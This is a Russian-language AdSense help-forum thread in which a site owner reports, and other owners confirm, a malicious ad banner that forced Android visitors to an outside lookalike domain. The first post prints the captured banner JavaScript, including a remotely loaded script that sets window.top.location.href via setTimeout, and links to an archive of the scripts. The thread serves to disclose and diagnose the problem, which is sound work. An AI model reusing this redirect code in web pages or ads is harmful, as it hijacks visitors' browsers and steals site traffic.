/adsense/community?hl=ru
/adsense/community?hl=ru
21.12.2014
Автор первой записи
Maxim Chirkov

Вредоносные рекламные блоки в AdSense

Добрый день !

Сегодня столкнулся на своём сайте с волной жалоб об автоматическом пробросе на внешний сайт без явного клика на баннер. Проблема проявляется только в браузерах для платформы Android. В ходе разбора выяснилось, что один и рекламных блоков меняет location.href и перебрасывает на левую страницу.
 
 Поймать этот вредоносный баннер можно на http://www.opennet.ru/test/1.html (там только код AdSense) Если почистить Cookie и поставить в User Agent идентификатор Chrome для Android, то через несколько перезагрузок страницы переброс ловится.
 
Переброс осуществляется на http://www.opennet.ru.tinymp.com/uc.php затем на 
 
 
Свойственные для проблемного баннера обращения к AdSense:
 
http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2075278885744463&output=html&h=90&slotname=4566802230&adk=1478762637&w=728&lmt=1419108108&flash=0&url=http%3A%2F%2Fwww.opennet.ru%2Ftest%2F1.html&dt=1419108108910&bdt=237&shv=r20141209&cbv=r20141212&saldr=sb&correlator=8570335602463&frm=20&ga_vid=1479378496.1419108112&ga_sid=1419108112&ga_hid=972738505&ga_fc=0&u_tz=300&u_his=3&u_java=1&u_h=900&u_w=1440&u_ah=850&u_aw=1440&u_cd=24&u_nplug=6&u_nmime=73&dff=serif&dfs=16&adx=720&ady=30&biw=1440&bih=454&eid=317150304&oid=3&rx=0&eae=0&fc=8&brdim=%2C%2C0%2C25%2C1440%2C25%2C1440%2C826%2C1440%2C454&vis=1&abl=XS&ppjl=u&fu=0&bc=1&ifi=1&xpc=31n2UrKVDS&p=http%3A//www.opennet.ru&dtd=3013
 
http://adx.stcounter.com/adx.js?kcid=51435b3f35749150bf000801&cid=%%CAMPAIGN_ID%%&size=728x90&tw=%%TARGET_WINDOW%%&clt=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCoo2lEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yugBiE%26num%3D1%26sig%3DAOD64_0Z4Kf-FA3h0PmInn27loC2ltc3qw%26client%3Dca-pub-2075278885744463%26adurl%3D&atf=%%ATF%%&fq=%20%20%20%20%20-1&url=&cb=1962283525
 
http://googleads.g.doubleclick.net/pagead/adview?ai=CzVkCEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yuIBdaX8TuSBQYIAxACGAGgBiE&sigh=ObijYOCrkhE&vis=1
 
 
Проблемный JavaScript код, который вызывает переход:
 
try{function callKonvertaZP(src) {if (typeof(src) == 'undefined') return; var d = document, b=d.body; if(src.toUpperCase().indexOf('HTTP://')==0||src.toUpperCase().indexOf('HTTPS://')==0) try{var img = d.createElement('IMG'); var s = src.replace(/%random%/, Math.round(Math.random()*9999999)); with(img.style){position = 'absolute'; width = '0px'; height = '0px';} img.src = s; b.insertBefore(img, b.firstChild);}catch(e){}}
var konverta_ad_href = '';
try{konverta_ad_href=(window.top || window.self).location.href;konverta_ad_href=encodeURIComponent(konverta_ad_href);}catch(e){}
function trackKonvertaClick() {callKonvertaZP('http://adclick.g.doubleclick.net/aclk?sa=l&ai=Coo2lEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yugBiE&num=1&sig=AOD64_0Z4Kf-FA3h0PmInn27loC2ltc3qw&client=ca-pub-2075278885744463&adurl=');}
 
  (function() {
    var wc = document.createElement('script'); wc.type = 'text/javascript'; wc.async = true;
    wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozilla%2F5.0+%28Linux%3B+Android+4.4.2%3B+Nexus+4+Build%2FKOT49H%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F34.0.1847.114+Mobile+Safari%2F537.36';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
  })();
 
callKonvertaZP('http://pix.stcounter.com/adx.gif?bid=514b006435749149c2000007&rnd=%random%');}catch(e){}
 
 
В частности, кусок 
 
  wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozilla%2F5.0+%28Linux%3B+Android+4.4.2%3B+Nexus+4+Build%2FKOT49H%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F34.0.1847.114+Mobile+Safari%2F537.36';
 
приводит к получению строки 
 
setTimeout("window.top.location.href='http://www.opennet.ru.tinymp.com/uc.php?random=1ee46b4c2993b711f28045af1b2e3edb';", 100);
 
которая затем выполняется  кодом:
 
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
 
 
 Полный архив со слепком скриптов в момент появления вредоносного баннера - http://www.opennet.ru/test/1.tgz (проблемный код в 1_files/ads_data/adx.js)
 

Контент в сообществе может быть не проверен или не актуален. Подробнее…
Все ответы (21)
24.12.2014
Автор первой записи
Maxim Chirkov
Видео с демонстрацией вредоносных действий:  https://www.youtube.com/watch?v=PggsU_KaxvM
Maxim Malenkin
11.01.2015
Maxim Malenkin
Макс, подтверждаю всю информацию.
сегодня случайно заметил на своем сайте.
Пытаюсь сообщить в гугл, но они не отвечают.
Народ на форумах просто не понимает масштабов аферы.

Люди: ваш трафик уводится через редирект на другой сайт.
Посреднком выступает google Adwords, который молчит с 21-го декабря. а на дворе уже 11 января.

Vadim
11.01.2015
Vadim
информацию передал
Но, тут на форуме был случай, пользователь тоже обнаружил редиректы
Позже оказалось проблема была в его роутере, для которого он скачал какую то левую прошивку "ускоряющую интернет"
Именно по этому так долго идут проверки всех таких сообщений
11.01.2015
Автор первой записи
Maxim Chirkov
Понятно, что на вредоносное ПО в первую очередь подумают. Поэтому я специально сразу проверил как на другом компьютере (проблема проявлялась через пару перезагрузок страниц у многих посетителей на любом Android-смартфоне), так и на другом сервере (специально создал поддомен и разместил код на абсолютно не коррелирующем со мной другом сервере).

Но и  без этого было сразу понятно, что проблема не во вредоносном ПО, так как по коду  видно, что это HTML5-баннер подставляет редирект (при вставках вредоносным ПО совсем другие особенности, как правило, в начало или конец добавляется явно выделяющийся кусок javascript, обычно запутанный).

Кстати, 25 декабря тот вредоносный баннер исчез. Для большей надёжности отключил в настройках AdSense динамические баннеры. С тех пор жалоб от пользователей пока не поступало.

Но я лично на этой неделе видел похожие мошеннические баннеры на сайте thevarguy.com - выводится окно, которое маскируется под диалог о необходимости принять условия обеспечения приватности, но на деле кидает куда-то во вне. Особо с этим случаем не разбирался, на  thecarguy полно каких-то левых блоков, лишь бегло заметил, что в том всплывшем диалоге в ссылке был googleadservices.com.


Maxim Malenkin
11.01.2015
Maxim Malenkin
Зараза раздается с этого домена:
 wc.src = 'https://pix.stcounter.com

Попробую дать конкретику:
1. Гугл включил в показы "левого" рекламодателя, возможно это его дочерняя контора.
2. трафик с сайтов воруется посредстовм  и перенаправляется на партнерские программы в зависимости от условий: мобильный оператор, ОСь.
3. Владелец сайта ничего не получает от adsense, просто теряет посетителей в том числе постоянных.
4. К сайту могут быть применены фильры поисковых систем за нарушение правил работы с ними: клоакинг, редирект.
5. Достоверно известно, что ситуация продолжается с 18-го декабря и что с 21 декабря о ней было заявлено в Гугл.

MrEvgeniy770
11.01.2015
MrEvgeniy770
Подтверждаю информацию
В целях избежания воровства моего траффика был вынужден переключиться на только текстовые объявления
a777
11.01.2015
a777
Подтверждаю, все объявления перевел в текстовые
iqmaker
11.01.2015
iqmaker
Подтверждаю речь не идет ни о каких вирусах, проблема именно в рекламном блоке гугла, это носит массовый характер и почему гугл спит не ясно. Возможно какие-то единичные обращения и можно рассматривать как угодно долго, но на подобного рода баги надо реагировать мгновенно. И да, вы сами можете проверить что все вышесказанное ТС, работает. 
алексей алекс
11.01.2015
алексей алекс
Да этой проблеме сто лет, из-за это в сентябре яндекс наложил санкции на многие сайты. Потом снял. Но эта проблема не только адсенса но и рся.
evgeny.v
11.01.2015
evgeny.v
Подтверждаю! Злоумышленники научились внедрять зловредный код в объявления..  Мдаа, уж ... ну и позорище, как же вы там свои продукты тестируете.
ЕЩЁ 10
kenlan
03.02.2016
kenlan
У меня тоже такая же проблема началась. 
Эти ответы были полезны?
Помогите нам улучшить их.
 
Вопрос заблокирован. Ответить на него невозможно. Остались вопросы? Обратитесь на справочный форум.

Значки

Некоторые участники могут получать значки, которые отражают, в каком качестве и насколько активно они вносят вклад в работу сообщества.

 
Сотрудник Google – наш специалист по какому-либо продукту или Менеджер сообщества.
 
Эксперт сообщества – сторонний специалист, который следит за качеством контента в сообществе.
 
Платиновый эксперт по продуктам – участник сообщества, который обладает глубоким знанием продукта Google и помогает другим пользователям и экспертам.
 
Золотой эксперт по продуктам – участник сообщества, который отлично разбирается в особенностях продукта Google и отвечает на вопросы пользователей.
 
Серебряный эксперт по продуктам – участник сообщества, который достаточно хорошо знаком с продуктом Google и отвечает на вопросы пользователей.
 
Почетный эксперт по продуктам – знаток наших сервисов, который больше не принимает участия в жизни сообщества.
Контент в сообществе может быть не проверен или не актуален. Подробнее…

Уровни

Уровень участника отражает его активность на форумах: чем активнее пользователь, тем выше его уровень. Каждый участник изначально находится на уровне 1 и может подняться до уровня 10. Вот какие достижения помогают увеличивать уровень:

  • вы ответили на вопрос;
  • ваш ответ признан лучшим;
  • пользователь отметил, что ему помогло ваше сообщение;
  • вы оценили сообщение другого участника как полезное или бесполезное;
  • вы обоснованно пожаловались на тему или сообщение.

Если ваше сообщение было удалено в связи с жалобами других пользователей, ваш уровень будет повышаться медленнее.

Вы хотите просмотреть профиль участника?

Это страница справки. Просматривать профили участников форума на ней нельзя.

Вы хотите пожаловаться на комментарий?

Этот комментарий размещен на форуме по продукту Google. А это страница справки, здесь нельзя подать жалобу.

Вы хотите ответить на комментарий?

Этот комментарий размещен на форуме по продукту Google. А это страница справки, здесь нельзя переписываться с пользователями.